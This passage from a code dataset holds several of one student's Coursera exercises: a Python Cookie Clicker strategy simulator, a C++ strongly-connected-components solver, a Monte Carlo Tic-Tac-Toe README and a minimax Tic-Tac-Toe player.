"text": "\"\"\"\nCookie Clicker Simulator\n\"\"\"\n\nimport simpleplot\nimport math\n\n# Used to increase the timeout, if necessary\nimport codeskulptor\ncodeskulptor.set_timeout(20)\n\nimport poc_clicker_provided as provided\n\n# Constants\nSIM_TIME = 10000000000.0\n\nclass ClickerState:\n \"\"\"\n Simple class to keep track of the game state.\n \"\"\"\n \n def __init__(self):\n self._tot_cookies = 0.0\n self._curr_cookies = 0.0\n self._curr_time = 0.0\n self._curr_cps = 1.0\n # game history has the time, an item that was bought at that time \n # (or None), the cost of the item, and the total number of cookies \n # produced by that time.\n self._game_history = [(0.0, None, 0.0, 0.0)]\n \n def __str__(self):\n \"\"\"\n Return human readable state\n \"\"\"\n state = (\"\\n\"+\"Total cookies: \" + str(self._tot_cookies) +\n \"\\n\" + \"Current cookies: \" + str(self._curr_cookies) + \n \"\\n\" +\"Current time of game: \" + str(self._curr_time) +\n \"s\" + \"\\n\" +\"Current CPS: \" + str(self._curr_cps) + \"\\n\") \n \n \n \n return state\n \n def get_cookies(self):\n \"\"\"\n Return current number of cookies \n (not total number of cookies)\n \n Should return a float\n \"\"\"\n return self._curr_cookies\n \n def get_cps(self):\n \"\"\"\n Get current CPS\n\n Should return a float\n \"\"\"\n return self._curr_cps\n \n def get_time(self):\n \"\"\"\n Get current time\n\n Should return a float\n \"\"\"\n return self._curr_time\n \n def get_history(self):\n \"\"\"\n Return history list\n\n History list should be a list of tuples of the form:\n (time, item, cost of item, total cookies)\n\n For example: [(0.0, None, 0.0, 0.0)]\n\n Should return a copy of any internal data structures,\n so that they will not be modified outside of the class.\n \"\"\"\n return list(self._game_history)\n\n def time_until(self, cookies):\n \"\"\"\n Return time until you have the given number of cookies\n (could be 0.0 if you already have enough cookies)\n\n Should return a float with no fractional part\n \"\"\"\n curr_cookies = self.get_cookies()\n if curr_cookies >= cookies :\n return 0.0\n else:\n curr_cps = self.get_cps()\n cookies_needed = cookies - curr_cookies\n time = math.ceil(cookies_needed / curr_cps)\n \n return time\n \n def wait(self, time):\n \"\"\"\n Wait for given amount of time and update state\n\n Should do nothing if time <= 0.0\n \"\"\"\n if (time > 0.0):\n self._curr_time += time\n self._curr_cookies += time * self._curr_cps\n # using self._tot_cookies += self._curr_cookies\n # give incorrect total cookies value since\n # it also adds the earlier cookie value\n self._tot_cookies += time * self._curr_cps \n \n def buy_item(self, item_name, cost, additional_cps):\n \"\"\"\n Buy an item and update state\n\n Should do nothing if you cannot afford the item\n \"\"\"\n if (cost <= self.get_cookies()):\n self._curr_cookies -= cost\n self._curr_cps += additional_cps\n self._game_history.append((self.get_time(), item_name, \n cost, self._tot_cookies))\n \n \ndef simulate_clicker(build_info, duration, strategy):\n \"\"\"\n Function to run a Cookie Clicker game for the given\n duration with the given strategy. 
Returns a ClickerState\n object corresponding to the final state of the game.\n \"\"\"\n # make a copy of the build_info object so as not to \n # mutate it\n build_info_copy = build_info.clone()\n # create a new Clickerstate\n clicker_state = ClickerState()\n # loop until duration has passed\n while (clicker_state.get_time() <= duration):\n # determine which item to buy based on the strategy\n item = strategy(clicker_state.get_cookies(),\n clicker_state.get_cps(),\n clicker_state.get_history(),\n duration - clicker_state.get_time(),\n build_info_copy)\n # if item is None, then that means no more items\n # can be purchased, and simulation should stop\n if (item == None):\n break\n # find the cost of the item\n item_cost = build_info_copy.get_cost(item)\n #print \"item cost: \", item_cost\n # Using the cost, find the time until we have enough \n # cookies to buy the item\n time_needed = clicker_state.time_until(item_cost)\n #print \"time needed: \", time_needed\n # stop the simulation if we do not have enough\n # time to buy the item\n if (time_needed + clicker_state.get_time() > duration):\n #print time_needed + clicker_state.get_time()\n break\n \n # wait until the time when we can buy the item\n clicker_state.wait(time_needed)\n # buy the item\n clicker_state.buy_item(item, item_cost, \n build_info_copy.get_cps(item))\n # update the build information which updates the cost\n # of the item\n build_info_copy.update_item(item)\n \n \n # if time is still left after stopping the simulation\n # allow cookies to accumulate for that amount of time\n if (clicker_state.get_time() < duration):\n clicker_state.wait(duration - clicker_state.get_time())\n \n \n \n return clicker_state\n\n\ndef strategy_cursor_broken(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always pick Cursor!\n\n Note that this simplistic (and broken) strategy does not properly\n check whether it can actually buy a Cursor in the time left. Your\n simulate_clicker function must be able to deal with such broken\n strategies. 
Further, your strategy functions must correctly check\n if you can buy the item in the time left and return None if you\n can't.\n \"\"\"\n return \"Cursor\"\n\ndef strategy_none(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always return None\n\n This is a pointless strategy that will never buy anything, but\n that you can use to help debug your simulate_clicker function.\n \"\"\"\n return None\n\ndef strategy_cheap(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always buy the cheapest item you can afford in the time left.\n \"\"\"\n # initalize varialbes\n cheapest_cost = float(\"inf\")\n cheapest_item = None\n # calculate the maximum cookies that can be used to\n # buy an item\n max_cost = cookies + time_left * cps\n # get all the items available to buy\n items_list = build_info.build_items() \n \n # find the cheapest item that can be afforded\n for item in items_list:\n current_item_cost = build_info.get_cost(item)\n if (current_item_cost <= max_cost \n and current_item_cost < cheapest_cost):\n cheapest_cost = current_item_cost\n cheapest_item = item\n \n return cheapest_item\n\ndef strategy_expensive(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always buy the most expensive item you can afford in the time left.\n \"\"\"\n # initalize varialbes\n expensive_cost = float(\"-inf\")\n expensive_item = None\n # calculate the maximum cookies that can be used to\n # buy an item \n max_cost = cookies + time_left * cps\n # get all the items available to buy\n items_list = build_info.build_items()\n\n # find the most expensive item that can be afforded\n for item in items_list:\n current_item_cost = build_info.get_cost(item)\n if (current_item_cost <= max_cost \n and current_item_cost > expensive_cost):\n expensive_cost = current_item_cost\n expensive_item = item\n \n return expensive_item\n\ndef strategy_best(cookies, cps, history, time_left, build_info):\n \"\"\"\n Always picks the item that minimizes the item's \n cost to item's cps \n \"\"\"\n # initalize varialbes\n min_cost_to_cps = float(\"inf\")\n best_item = None\n # calculate the maximum cookies that can be used to\n # buy an item\n max_cost = cookies + time_left * cps\n # get all the items available to buy\n items_list = build_info.build_items()\n \n # buy the item that minimizes the cost per cps\n for item in items_list:\n item_cost = build_info.get_cost(item)\n item_cps = build_info.get_cps(item)\n item_cost_to_cps = item_cost / item_cps \n if (item_cost <= max_cost and \n item_cost_to_cps < min_cost_to_cps):\n min_cost_to_cps = item_cost_to_cps\n best_item = item\n \n return best_item\n \ndef run_strategy(strategies, time):\n \"\"\"\n Run a simulation for all strategies for the give time\n \n strategies is a dictionary with key the strategy name\n of type string and value the strategy function name\n \"\"\"\n # initialize the local variables\n states = []\n histories = []\n plot_history = []\n strategy_names = []\n\n # store all the states and their names for each strategy\n for strategy_name, strategy_type in strategies.items():\n state = simulate_clicker(provided.BuildInfo(), \n time, strategy_type)\n states.append(state)\n strategy_names.append(strategy_name)\n print strategy_name, \":\", state\n \n # get the history of each strategy's state \n for state in states:\n histories.append(state.get_history())\n \n # store just the time and total cookies from the history \n # for plotting purpose\n for history in list(histories):\n history = [(item[0], item[3]) for item in history]\n 
plot_history.append(history)\n \n # plot all strategies time vs total cookies on one figure \n simpleplot.plot_lines(\"strategy plots\", 1000, 600, 'Time', 'Total Cookies', \n plot_history, True, strategy_names)\n \ndef run():\n \"\"\"\n Run the simulator.\n \"\"\" \n \n strategies = {\"Cheap\":strategy_cheap, \n \"Expensive\": strategy_expensive,\n \"Best\": strategy_best}\n \n run_strategy(strategies, SIM_TIME)\n\n#####################################\n#run the simmulation\n#####################################\nrun()\n\n"
},
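The waiting-time logic in the Cookie Clicker record reduces to one ceiling division. A quick numeric check of the formula used by `time_until` (the values here are made up for illustration):

```python
import math

# With 3.0 cookies in hand, 1.5 cookies per second, and an item costing 10.0:
cookies, cps, cost = 3.0, 1.5, 10.0
time_needed = math.ceil((cost - cookies) / cps)  # ceil(7.0 / 1.5) = ceil(4.66...)
assert time_needed == 5.0                        # wait five whole seconds
assert cookies + time_needed * cps >= cost       # 3.0 + 7.5 = 10.5, enough to buy
```

The ceiling matters because `wait` advances time in whole seconds; rounding down would leave the simulation a fraction of a cookie short of the purchase.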
{
"alpha_fraction": 0.6042701601982117,
"alphanum_fraction": 0.6235294342041016,
"avg_line_length": 32.56325149536133,
"blob_id": "919d6cf90173dd61f9fdc828180ecc19ed5ad1b7",
"content_id": "b421a47ac2ac2215c7c5807e0686a6c512e5033f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11497,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 332,
"path": "/Algorithms on Graphs/Assignment2/strongly_connected.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: strongly_connected.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-31\r\n// description: Problem 3 of the second assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Compute the number of strongly connected components of a given\r\n//\t\t\t\tdirected graph with n vertices and m edges.\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tall other functions had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.09/1.00 sec, max memory used: 11.02/512 MB. \r\n\r\n\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <vector>\r\n#include <numeric>\r\n\r\n\r\n// first element stores number for each node visited in pre-order while the second one\r\n// stores post order visit number for that node\r\n#define preAndPost pair<int,int>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n//sort criteria based on max post order number\r\nstruct sort_pairs {\r\n\tbool operator()(const std::pair<preAndPost, int> &left, const std::pair<preAndPost, int> &right) {\r\n\t\treturn left.first.second > right.first.second;\r\n\t}\r\n};\r\n\r\n// Takes a Directed Graph and reverses its edges\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; rev_adj.size() = adj.size()\r\n//\t\tnumber of edges of rev_adj is 0.\r\n//\r\n// POST: updates rev_adj such that all the edges of adj are reversed.\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t rev_adj = a graph with only nodes but no edges\r\nvoid reverse_graph(vector< vector <int> > adj, vector< vector <int> > &rev_adj) {\r\n\r\n\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\t\tfor (vector<int>::size_type u = 0; u < adj[v].size(); u++) {\r\n\t\t\trev_adj[adj[v][u]].push_back(v);\r\n\t\t}\r\n\t}\r\n\r\n}\r\n\r\n// Recursively updates the visited status of all the nodes of the graph adj\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; visited.size() = adj.size()\t\r\n//\r\n// POST: updates visited vector with 1 for nodes visited and sends the total number of nodes that were visited.\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t visited = keeps track of all the vertices that have already been visited\r\n//\t\t x = the vertice and its reachable neighbours to be marked visited\r\n//\t\t i = a variable used to keep track of total number of visited nodes in each function call.\r\n\r\nint mark_visited(vector<vector<int> > &adj, vector<int> &visited, int x, int i) {\r\n\r\n\tif (adj[x].size() == 0) {\r\n\r\n\t\tvisited[x] = 1;\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tvisited[x] = 1;\r\n\ti++;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == 0) {\r\n\r\n\t\t\ti = mark_visited(adj, visited, adj[x][v], i);\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn i;\r\n}\r\n\r\n\r\n// Recursively updates the pre_pos vector with pre and post order visit number of a vertice and it reachable \r\n// neighbours. Returns the largest post order visit number. \r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; visited.size() = adj.size();\r\n//\t\tpre_pos.size() = adj.size(). 0 <= x < adj.size(). 
0 <= i < adj.size()*2\r\n//\r\n// POST: updates visited vector with 1 for nodes visited and pre_pos vector with pre and post visit numbers\r\n//\t\t and their respective vertices. Returns the maximum post order visit number from visited nodes\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t visited = keeps track of all the vertices that have already been visited\r\n//\t\t pre_pos = stores the vertice and it respective pre and post order visit number.\r\n//\t\t x = the vertice and its reachable neighbours to be marked visited and their pre and post order numbers\r\n//\t\t\t to updated accordingly.\r\n//\t\t i = Used to keep track of the pre and post order visit numbers\r\n\r\nint explore(vector<vector<int> > &adj, vector<int> &visited, vector< pair <preAndPost, int > > &pre_pos, int x, int i) {\r\n\r\n\r\n\tif (adj[x].size() == 0) {\r\n\r\n\t\tpre_pos[x].first.first = i;\r\n\t\tpre_pos[x].first.second = i + 1;\r\n\t\tpre_pos[x].second = x;\r\n\t\tvisited[x] = 1;\r\n\t\treturn i + 1;\r\n\r\n\t}\r\n\t//mark the current node (i.e. x as visited)\r\n\tvisited[x] = 1;\r\n\r\n\t//update the pre order visit number\r\n\tpre_pos[x].first.first = i;\r\n\t//associate this pre order number with the current vertice x\r\n\tpre_pos[x].second = x;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj[x].size(); v++) {\r\n\r\n\t\tif (visited[adj[x][v]] == 0) {\r\n\r\n\t\t\t// Do Depth first exploration of neighbours of the current vertice x and mark\r\n\t\t\t// their pre and post order visit numbers recursively\r\n\t\t\ti = explore(adj, visited, pre_pos, adj[x][v], i + 1);\r\n\r\n\t\t}\r\n\t}\r\n\r\n\t//update the post order number\r\n\tpre_pos[x].first.second = i + 1;\r\n\r\n\treturn i + 1;\r\n\r\n\r\n}\r\n\r\n// Updates the pre_pos vector with pre and post order visit number of all vertices in a graphs using the helper\r\n// function explore\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; visited.size() = adj.size();\r\n//\t\tpre_pos.size() = adj.size(). \r\n// POST: updates pre_pos vector with pre and post visit numbers for the given graph adj\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t visited = keeps track of all the vertices that have already been visited\r\n//\t\t pre_pos = stores the vertice and it respective pre and post order visit number.\r\n\r\nvoid DFS(vector< vector <int> > adj, vector<int> visited, vector< pair< preAndPost, int > > &pre_pos) {\r\n\r\n\tint i = 0;\r\n\r\n\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\r\n\t\tif (visited[v] == 0) {\r\n\r\n\t\t\t\r\n\t\t\ti = explore(adj, visited, pre_pos, v, i);\r\n\t\t\t\r\n\t\t\ti++;\r\n\t\t}\r\n\t}\r\n\r\n\r\n}\r\n\r\n\r\n//The idea behind finding the strongly connected components is as follows:\r\n/***************************************************************************************************************************\r\n// if v is in the sink strongly connected component (SSC)--v may not be a sink itself--then\r\n// all the vertice reachable from v and v itself form a SSC. 
Thus if we find a vertice in sink SCC\r\n// and explore all the vertice reachable from it, we can find one strongly connected component of a graph\r\n//\r\n// In order to do so we use the following theorem:\r\n// --- \"If C and C' are two SSC where there's an edge from some vertex of C to some vertex of C'.\r\n//\t The largest post number in C Is larger than the largest post number in C'.\" ---taken from\r\n//\t the lecture slides for this coure\r\n//\r\n// However, the largest post number is in the source SSC. Thus we reverse the given graph find the source SSC, which\r\n// is the sink SSC of the original graph by marking the pre and post number using the explore function above. The vertice\r\n// with the highest post number and all the reachable vertice from it forms a SSC. Next we explore the vertice with the second\r\n// largest post number and find all the reachable vertices from it to get the next SSC. We continue doing this until we have\r\n// visited all the vertices.\r\n//\r\n***************************************************************************************************************************/\r\n\r\n// Finds the number of strongly connected components of the graph\r\n// function explore\r\n//\r\n// PRE: 1 ≤ adj.size() ≤ 10e4; number of edges of adj is between 0 and 10e4; \r\n// POST: returns the total number of strongly connected component of the graph adj\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n\r\nint number_of_strongly_connected_components(vector< vector<int> > adj) {\r\n\r\n\r\n\t//To keep track of the total number of strongly connected components\r\n\tint result = 0;\r\n\t//Used to get the vertice with highest post order visit number\r\n\tint maxPosVer = 0;\r\n\tint adjSize = adj.size();\r\n\tint i = 0;\r\n\r\n\tvector< int > visited(adj.size(), 0);\r\n\tvector<vector <int> > rev_adj(adj.size(), vector<int>());\r\n\tvector< pair <preAndPost, int > > pre_pos(adj.size());\r\n\r\n\t\r\n\t//reverse the edges of the given graph\r\n\treverse_graph(adj, rev_adj);\r\n\r\n\t//mark pre and post number on the vertice of this reverse graph\r\n\tDFS(rev_adj, visited, pre_pos);\r\n\r\n\t//sort based on the vertice with highest post number to the lowest one\r\n\tstd::sort(pre_pos.begin(), pre_pos.end(), sort_pairs());\r\n\r\n\t//while all the vertices have not be visited\r\n\twhile (i < adjSize) {\r\n\r\n\t\tfor (vector<int>::size_type v = 0; v < adj.size(); v++) {\r\n\t\t\t//if the vertice has not been visited\r\n\t\t\tif (visited[pre_pos[v].second] == 0) {\r\n\r\n\t\t\t\t//store the vertice with the highest post number\r\n\t\t\t\tmaxPosVer = pre_pos[v].second;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\t// mark all the vertices reachable from maxPosVer and maxPosVer as visited \r\n\t\t// and update the number of visited vertices\r\n\t\tadjSize -= mark_visited(adj, visited, maxPosVer, 0);\r\n\t\t//increment the number of SCC\r\n\t\tresult++;\r\n\r\n\t}\r\n\r\n\treturn result;\r\n}\r\n\r\nint main() {\r\n\r\n\t// Few test case to check if the number_of_strongly_connected_components function and its helper functions works. 
\r\n\t//These are commented since the assignment requires the strongly_connected.cpp file to read input values and output\r\n\t//the respective results on the console\r\n\t/**************************************************************************************\r\n\t//Test 1\r\n\r\n\tvector< vector<int> > adj1(6, vector<int>());\r\n\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\r\n\tadj1[2 - 1].push_back(6 - 1);\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\r\n\tadj1[3 - 1].push_back(5 - 1);\r\n\r\n\tadj1[5 - 1].push_back(6 - 1);\r\n\r\n\tadj1[6 - 1].push_back(1 - 1);\r\n\r\n\tif (number_of_strongly_connected_components(adj1) == 2)\r\n\t\tstd::cout << \"Test 1 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 Failed...\" << std::endl;\r\n\r\n\t//Test 2\r\n\tvector< vector<int> > adj2(5, vector<int>());\r\n\r\n\tadj2[2 - 1].push_back(1 - 1);\r\n\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[5 - 1].push_back(3 - 1);\r\n\r\n\tif (number_of_strongly_connected_components(adj2) == 5)\r\n\t\tstd::cout << \"Test 2 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 Failed...\" << std::endl;\r\n\r\n\r\n\r\n\t//Test 3\r\n\tvector< vector<int> > adj3(4, vector<int>());\r\n\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\r\n\tadj3[4 - 1].push_back(1 - 1);\r\n\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\r\n\tadj3[3 - 1].push_back(1 - 1);\r\n\r\n\tif (number_of_strongly_connected_components(adj3) == 2)\r\n\t\tstd::cout << \"Test 3 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 3 Failed...\" << std::endl;\r\n\t\r\n\t//Test 4\r\n\tvector< vector<int> > adj4(500, vector<int>());\r\n\r\n\tif (number_of_strongly_connected_components(adj4) == 500)\r\n\t\tstd::cout << \"Test 4 Passed...\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 4 Failed...\" << std::endl;\r\n\r\n\t**************************************************************************************/\r\n\t// The code below was mostly provided as a part of the starter file for the assignment with few modifications\r\n\tsize_t n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector< vector<int> > adj(n, vector<int>());\r\n\tfor (size_t i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t}\r\n\tstd::cout << number_of_strongly_connected_components(adj);\r\n\r\n\r\n}\r\n"
},
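The long comment block in the SCC record describes a Kosaraju-style pipeline: reverse the graph, take vertices in decreasing post-order of the reversed graph, and peel off one sink component per fresh exploration of the original graph. The same idea in compact Python, offered as a hedged sketch rather than a port of the C++ above; it is recursive, so the recursion limit is raised for large inputs.

```python
import sys

def count_sccs(adj):
    """Count strongly connected components of a directed graph given as an
    adjacency list.  DFS on the reversed graph produces a post-order; every
    fresh exploration of the original graph, taken in decreasing post-order,
    marks exactly one SCC."""
    sys.setrecursionlimit(10 ** 6)
    n = len(adj)
    rev = [[] for _ in range(n)]
    for u in range(n):
        for v in adj[u]:
            rev[v].append(u)

    order, seen = [], [False] * n

    def post_order(u):
        seen[u] = True
        for v in rev[u]:
            if not seen[v]:
                post_order(v)
        order.append(u)          # appended after all descendants: post-order

    for u in range(n):
        if not seen[u]:
            post_order(u)

    count, seen = 0, [False] * n

    def mark(u):
        seen[u] = True
        for v in adj[u]:
            if not seen[v]:
                mark(v)

    for u in reversed(order):    # highest post number first
        if not seen[u]:
            mark(u)              # everything reached here is one SCC
            count += 1
    return count
```

On the record's Test 1 graph this returns 2, and on an edgeless 500-vertex graph it returns 500, matching the commented C++ test cases.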
{
"alpha_fraction": 0.7736093401908875,
"alphanum_fraction": 0.782233715057373,
"avg_line_length": 177.38461303710938,
"blob_id": "9b9e4200acb148b8aa3e01c3dcf9e4038446746a",
"content_id": "61c01151693e6a8192801e13dc2a14e075dc4af6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2319,
"license_type": "no_license",
"max_line_length": 774,
"num_lines": 13,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project3 Tic-Tac-Toe(Monte Carlo)/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #3 - Tic-Tac-Toe(Monte Carlo)\n\nImplemented the machine player for Tic-Tac-Toe game using Monte Carlo in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_837ymbxE9L_47.py) and press the play button on the top left corner. \n\nMini-project overview taken from course page can be found below:\n* [Tic-Tac-Toe](https://en.wikipedia.org/wiki/Tic-tac-toe) is a simple children's game played on a <a href=\"https://www.codecogs.com/eqnedit.php?latex=3&space;\\times&space;3\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?3&space;\\times&space;3\" title=\"3 \\times 3\" /></a> grid. Players alternate turns placing an \"X\" or an \"O\" on an empty grid square. The first player to get three-in-a-row wins. If you know the appropriate strategy and your opponent does not, you cannot lose the game. Further, if both players understand the appropriate strategy the game will always end in a tie. An interesting variant of the game is \"reverse\" Tic-Tac-Toe in which you lose if you get three-in-a-row. The game is also more interesting if you play on larger square grids.\n\n* For this assignment, your task is to implement a machine player for Tic-Tac-Toe. Specifically, your machine player will use a Monte Carlo simulation to decide its next move. We will provide both a console-based interface to the game where your machine player will play against itself and a graphical user interface where you can play against your machine player. Although the game is played on a 3x3 grid, your version should be able to handle any square grid. We will continue to use the same grid conventions that we have used previously.\n\n* For this mini-project, we will provide you with a complete implementation of a Tic-Tac-Toe Board class. However, for your part of the mini-project, we will provide only a very minimal amount of [starting code](http://www.codeskulptor.org/#poc_ttt_template.py). We will also dispense with the phased description of the implementation process so that your coding task for this mini-project is a more realistic example of the software development process.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/7gPV5/mini-project-description>\n"
},
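The Monte Carlo README above stays at the level of prose. One simple way to realize "use a Monte Carlo simulation to decide its next move" is to rate each candidate first move by random playouts; the sketch below assumes a board object with `clone()`, `move()`, `get_empty_squares()` and `check_win()` loosely modelled on the course's provided `TTTBoard`, and the course's grading version scores whole finished boards rather than candidate first moves, so treat this as an illustration only.

```python
import random

def mc_move(board, player, opponent, trials):
    """Pick the empty square with the best random-playout record: for each
    candidate first move, finish the game with uniformly random moves
    `trials` times and tally wins minus losses for `player`.  check_win()
    is assumed to return None while the game is in progress and the winner
    (or a distinct DRAW value) once it ends."""
    best_square, best_score = None, float("-inf")
    for square in board.get_empty_squares():
        score = 0
        for _ in range(trials):
            trial = board.clone()
            trial.move(square[0], square[1], player)
            current = opponent
            # play the rest of the game with uniformly random moves
            while trial.check_win() is None:
                row, col = random.choice(trial.get_empty_squares())
                trial.move(row, col, current)
                current = player if current == opponent else opponent
            winner = trial.check_win()
            if winner == player:
                score += 1
            elif winner == opponent:
                score -= 1       # draws contribute 0
        if score > best_score:
            best_square, best_score = square, score
    return best_square
```

More trials sharpen the estimate at the cost of time; on a 3x3 board even a few dozen playouts per square are usually enough to avoid obvious blunders.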
{
"alpha_fraction": 0.628324031829834,
"alphanum_fraction": 0.6348175406455994,
"avg_line_length": 38.43902587890625,
"blob_id": "cc6a625f6d4414b4ccd94344f9cccd29bf6f97dc",
"content_id": "943dfa24952ab6bb01960d56f82fd174b6f3b7eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3234,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 82,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project3 Tic-Tac-Toe(Minimax)/tic_tac_toe_minimax.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMini-max Tic-Tac-Toe Player\n\"\"\"\n\nimport poc_ttt_gui\nimport poc_ttt_provided as provided\n\n# Set timeout, as mini-max can take a long time\nimport codeskulptor\ncodeskulptor.set_timeout(60)\n\n# SCORING VALUES - DO NOT MODIFY\nSCORES = {provided.PLAYERX: 1,\n provided.DRAW: 0,\n provided.PLAYERO: -1}\n\ndef mm_move(board, player):\n \"\"\"\n Make a move on the board.\n \n Returns a tuple with two elements. The first element is the score\n of the given board and the second element is the desired move as a\n tuple, (row, col).\n \"\"\"\n # get the current state of the board\n game_state = board.check_win()\n # check the base case when the game is over\n if (game_state != None):\n return SCORES[game_state], (-1,-1)\n else:\n # initialize a list that will store all moves to be maximized\n moves = []\n # get all the possible empty board positions where the\n # current player can make a move if the game is still in progress\n empty_squares = board.get_empty_squares()\n # iterate over all of these possible empty position on the current\n # board\n for empty_square in empty_squares: \n # create a copy of the board so as not to mutate the current board\n board_copy = board.clone()\n # make a move on the current empty location of the board copy \n board_copy.move(empty_square[0], empty_square[1], player)\n # call mm_move recursively to perform depth first search of the\n # current game board's children i.e all possible board layout\n score = mm_move(board_copy, provided.switch_player(player))[0]\n # if the score is such that the current player has won the game,\n # return that score, and th winning move location (row, col).\n # Otherwise store the score * SCORES[player] and the move location.\n # score * SCORES[player] is needed so that we can maximize the moves\n # for both players rather than maximizing for PLAYERX and minimizing \n # for PLAYERO\n if (score == SCORES[player]):\n return score, empty_square\n else:\n moves += [(score * SCORES[player], empty_square)]\n\n # find the move that has the max score. Since the score is multplied \n # by SCORES[player], we are actually maximizing for one player(PLAYERX)\n # and minimizing for the other(PLAYERO)\n max_move = list(max(moves))\n # change the move back to the original value \n max_move[0] = max_move[0] * SCORES[player]\n # return this max/minimzied move\n return tuple(max_move)\n \n\ndef move_wrapper(board, player, trials):\n \"\"\"\n Wrapper to allow the use of the same infrastructure that was used\n for Monte Carlo Tic-Tac-Toe.\n \"\"\"\n move = mm_move(board, player)\n assert move[1] != (-1, -1), \"returned illegal move (-1, -1)\"\n return move[1]\n\n# Test game with the console or the GUI.\n# Uncomment whichever you prefer.\n# Both should be commented out when you submit for\n# testing to save time.\n\n# provided.play_game(move_wrapper, 1, False) \npoc_ttt_gui.run_gui(3, provided.PLAYERO, move_wrapper, 1, False)\n"
},
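The comments in tic_tac_toe_minimax.py above lean on one non-obvious idea: multiplying each child's score by SCORES[player] lets both players simply maximize instead of alternating max and min. A tiny self-contained sketch of that same negamax identity, on a hypothetical two-ply game tree rather than the course's board class:

```python
def negamax(node, mover):
    """mover is +1 for X, -1 for O; integer leaves hold X's payoff.
    Multiplying child scores by the mover's sign turns the usual
    max/min alternation into a single max at every level."""
    if isinstance(node, int):
        return node
    return mover * max(mover * negamax(child, -mover) for child in node)

# X moves at the root, O replies one ply down; X can secure a draw (0):
# left branch lets O hold X to 0, right branch lets O force -1.
tree = [[1, 0], [-1, 1]]
assert negamax(tree, +1) == 0
```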
{
"alpha_fraction": 0.5418288111686707,
"alphanum_fraction": 0.5914396643638611,
"avg_line_length": 31.078125,
"blob_id": "7cca75a6f66501bfba5cbe3d8107408ca09f2981",
"content_id": "10c42066af7beb6e6a6e26fbc610ed9077629fe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2056,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 64,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project1 2048(Merge)/merge2048.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
